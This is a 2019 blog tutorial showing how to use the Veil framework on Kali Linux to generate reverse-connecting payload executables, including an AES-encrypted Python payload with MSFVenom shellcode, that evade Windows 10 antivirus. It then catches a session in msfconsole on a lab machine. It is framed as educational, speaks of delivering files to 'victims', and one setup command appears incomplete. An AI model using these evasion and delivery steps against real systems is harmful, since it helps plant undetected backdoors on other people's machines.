Antivirus Bypass with Veil

Avoiding Detection and Going Rogue..

Posted by Dennis on July 3, 2019


Before you continue reading, understand that this tutorial is for educational and demonstration purposes only and I do not condone or support the use of this article posting as a means to help commit any type of crime for malicious purposes. Using this material illegally is punishable under federal law.


What is Veil?

Formely known as "Veil-Evasion", Veil is a tool written in Python 3.0 that is used to create and generate antivirus-evading payload executables. With Python 2.0 end of life (EOL) coming in 2020, Veil-Evasion was Veil's predecessor and is no longer being supported as it was written in Python 2. Not to worry though as Veil's payload and output files are supported in multiple programming languages and also includes two new additional languages, AutoIt3 and Lua. You can learn more about AutoIt scripting language here and Lua fast programming language here.

From pentesters to hackers, one of the most important issues that must be addressed is how to remain undetected within an network/environment and how to evade security. Major companies and businesses all over the world use a wide range of tools and devices including: antivirus software, firewalls, web application firewalls, intrusion detection systems and many other devices, programs, and applications to protect themselves in the event of an attack. A majority of all devices use a signature-based detection mechanism where a database of known exploits and payload signatures reside. The goal here is to create an exploit or change the signature of a known exploit or payload. Veil is the tool we can use to change the signature of a payload to achieve this task. Lets begin.

1. Veil Installation on Kali Linux

Veil is fairly simple to install and get started on Kali Linux. You can copy and paste my command syntax under the next several images below if you would like to follow along. If you come across issues at any point in time, feel free to visit the official Veil repository for further installation instructions. Official documentation can be found here.

apt-get install veil

Once the installation is complete, execute the command syntax as highlighted in the image below.

/usr/share/veil/config/ --force --silent

The installation and initial setup may take several minutes so feel free to grab a coffee while everything is installed and configured. Once completed, you can launch Veil from a terminal by simply typing "veil".

2. Generating a Payload Executable

Upon the initial Veil main menu page, you will be given various options depending on your use case. Here I selected to "use evasion" and listed the available payload options.

use evasion | list

I selected to "use 39" which I will use to create a .exe executable file and send to my Windows 10 machine to test momentarily.

use 39

Below is the payload options screen. I kept the default LPORT and changed the LHOST to my Kali Linux virtual machine's ip address. Note that your ip will be different from mine. The listening port is used to establish a connection to the victim once he/she initiates the .exe file.

Configuring options | set LHOST Verifying my ip address for LHOST

The LHOST is set to my Kali ip address and I generated the payload. You can see the default location of where the payload resides highlighted in yellow at the bottom of the image.

Getting the file to open on the victims machine is where you need to get creative. For demonstration purposes, I used secured copy (scp) and Git on the Windows 10 virtual machine to transfer the file to my desktop.

scp user@ip:/etc/../your-file "C:/Users/XXX/Download"

You can see here that Windows 10 virus and threat protection picked up the exectuable unfortunately. Let's quickly try another payload!

This time, I decided to generate an encrypted Python payload (use 29) to evade detection. Python AES Encryption uses VirtualAlloc injection which will essentially create an executable area in memory with Advanced Encryption Standard (AES).

Here I will use MSFVenom to generate my shellcode (option 2) and setup the LHOST and LPORT again.

The executable is now ready. I will again transfer the file using secure copy.

Bingo! The executable has remained undetected. Note that this is also an earlier version of Windows 10 as I use it for research purposes. Newer versions of Windows may pick up the file as malicious. You can also upload your executable to a website called virustotal. This free website lets you scan malicious files and gives you engines that would otherwise deem this file as malicious. 34 out of 68 engines detected this file.

3. Final Thoughts

Being able to generate and deliver this executable to a victim machine can enable us to perform multiple attacks. Below you can see that I ended up using msfconsole to create a connection to the Windows 10 machine when the executable was selected. This is just one of many tools available for performing antivirus evasion. I hope you enjoyed this tutorial and were able to get Veil setup without any problems!